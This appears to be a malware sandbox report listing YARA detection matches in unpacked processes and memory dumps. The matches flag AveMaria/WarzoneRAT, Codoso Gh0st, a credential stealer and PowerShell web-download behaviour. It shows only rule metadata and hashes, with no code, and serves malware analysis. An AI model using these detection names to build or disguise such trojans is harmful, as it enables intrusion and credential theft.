Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
